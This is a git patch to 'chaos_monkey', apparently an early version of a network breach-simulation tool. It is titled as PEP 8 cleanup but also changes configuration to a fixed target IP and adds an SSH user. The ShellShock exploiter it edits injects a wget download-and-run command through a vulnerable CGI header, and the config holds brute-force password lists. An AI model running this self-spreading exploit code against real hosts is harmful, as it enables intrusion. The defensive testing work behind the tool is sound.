From cd27438a1ee64a73015bb6978038041c488cb51c Mon Sep 17 00:00:00 2001 From: daniel goldberg Date: Mon, 29 Aug 2016 13:48:00 +0300 Subject: [PATCH] PEP 8 changes --- chaos_monkey/config.py | 8 ++++---- chaos_monkey/exploit/shellshock.py | 24 +++++++++++------------- chaos_monkey/exploit/tools.py | 3 ++- 3 files changed, 17 insertions(+), 18 deletions(-) diff --git a/chaos_monkey/config.py b/chaos_monkey/config.py index 683751c4f..9c63765ee 100644 --- a/chaos_monkey/config.py +++ b/chaos_monkey/config.py @@ -135,7 +135,7 @@ class Configuration(object): scanner_class = TcpScanner finger_classes = [SMBFinger, SSHFinger, PingScanner, HTTPFinger] exploiter_classes = [SmbExploiter, WmiExploiter, RdpExploiter, Ms08_067_Exploiter, # Windows exploits - SSHExploiter, ShellShockExploiter #Linux + SSHExploiter #Linux ] # how many victims to look for in a single scan iteration @@ -167,11 +167,11 @@ class Configuration(object): ########################### # Auto detect and scan local subnets - local_network_scan = True + local_network_scan = False range_class = FixedRange range_size = 1 - range_fixed = [''] + range_fixed = ['10.0.1.160'] # TCP Scanner HTTP_PORTS = [80, 8080, 443, @@ -201,7 +201,7 @@ class Configuration(object): psexec_passwords = ["Password1!", "1234", "password", "12345678"] # ssh exploiter - ssh_users = ["root"] + ssh_users = ["root",'user'] ssh_passwords = ["Password1!", "1234", "password", "12345678"] # rdp exploiter diff --git a/chaos_monkey/exploit/shellshock.py b/chaos_monkey/exploit/shellshock.py index dc853a65a..0211deaa7 100644 --- a/chaos_monkey/exploit/shellshock.py +++ b/chaos_monkey/exploit/shellshock.py @@ -16,7 +16,6 @@ __author__ = 'danielg' LOG = logging.getLogger(__name__) TIMEOUT = 2 -DOWNLOAD_TIMEOUT = 60 TEST_COMMAND = '/bin/uname -a' DOWNLOAD_TIMEOUT = 60 # copied from rdpgrinder @@ -46,7 +45,7 @@ class ShellShockExploiter(HostExploiter): LOG.info( 'Scanning %s, ports [%s] for vulnerable CGI pages' % ( - host, ",".join([str(port[0]) for port in valid_ports])) + host, ",".join([str(port[0]) for port in valid_ports])) ) attackable_urls = [] @@ -92,15 +91,14 @@ class ShellShockExploiter(HostExploiter): LOG.debug("Error running uname machine commad on victim %r: (%s)", host, exc) return False - src_path = src_path or get_target_monkey(host) - # copy the monkey dropper_target_path_linux = self._config.dropper_target_path_linux - if (self.skip_exist) and (self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)): + if self.skip_exist and (self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)): LOG.info("Host %s was already infected under the current configuration, done" % host) - return True # return already infected + return True # return already infected + src_path = src_path or get_target_monkey(host) if not src_path: LOG.info("Can't find suitable monkey executable for host %r", host) return False @@ -111,17 +109,17 @@ class ShellShockExploiter(HostExploiter): LOG.debug("Exploiter ShellShock failed, http transfer creation failed.") return False - download_command = '/usr/bin/wget %s -O %s;' % ( http_path, dropper_target_path_linux) - download_and_run = exploit + download_command - resp = self.attack_page(url, header, download_and_run) + download = exploit + download_command + self.attack_page(url, header, download) http_thread.join(DOWNLOAD_TIMEOUT) http_thread.stop() - if (http_thread.downloads != 1) or ('ELF' not in self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)): + if (http_thread.downloads != 1) or ( + 'ELF' not in self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)): LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__) continue @@ -134,12 +132,12 @@ class ShellShockExploiter(HostExploiter): cmdline = "%s %s" % (dropper_target_path_linux, MONKEY_ARG) cmdline += build_monkey_commandline(host, depth - 1) + ' & ' run_path = exploit + cmdline - resp = self.attack_page(url, header, run_path) + self.attack_page(url, header, run_path) LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)", self._config.dropper_target_path_linux, host, cmdline) - if not (self.check_remote_file_exists(url,header,exploit,self._config.monkey_log_path_linux)): + if not (self.check_remote_file_exists(url, header, exploit, self._config.monkey_log_path_linux)): LOG.info("Failed running the monkey, log file does not exist") continue @@ -206,7 +204,7 @@ class ShellShockExploiter(HostExploiter): return urls @staticmethod - def report_vuln_shellshock(host,url): + def report_vuln_shellshock(host, url): from control import ControlClient ControlClient.send_telemetry('exploit', {'result': False, 'machine': host.__dict__, 'exploiter': ShellShockExploiter.__name__, diff --git a/chaos_monkey/exploit/tools.py b/chaos_monkey/exploit/tools.py index 052469802..a7350a3f6 100644 --- a/chaos_monkey/exploit/tools.py +++ b/chaos_monkey/exploit/tools.py @@ -425,4 +425,5 @@ def report_failed_login(exploiter, machine, user, password): from control import ControlClient ControlClient.send_telemetry('exploit', {'result': False, 'machine': machine.__dict__, 'exploiter': exploiter.__class__.__name__, - 'user':user,'password':password}) \ No newline at end of file + 'user':user,'password':password}) +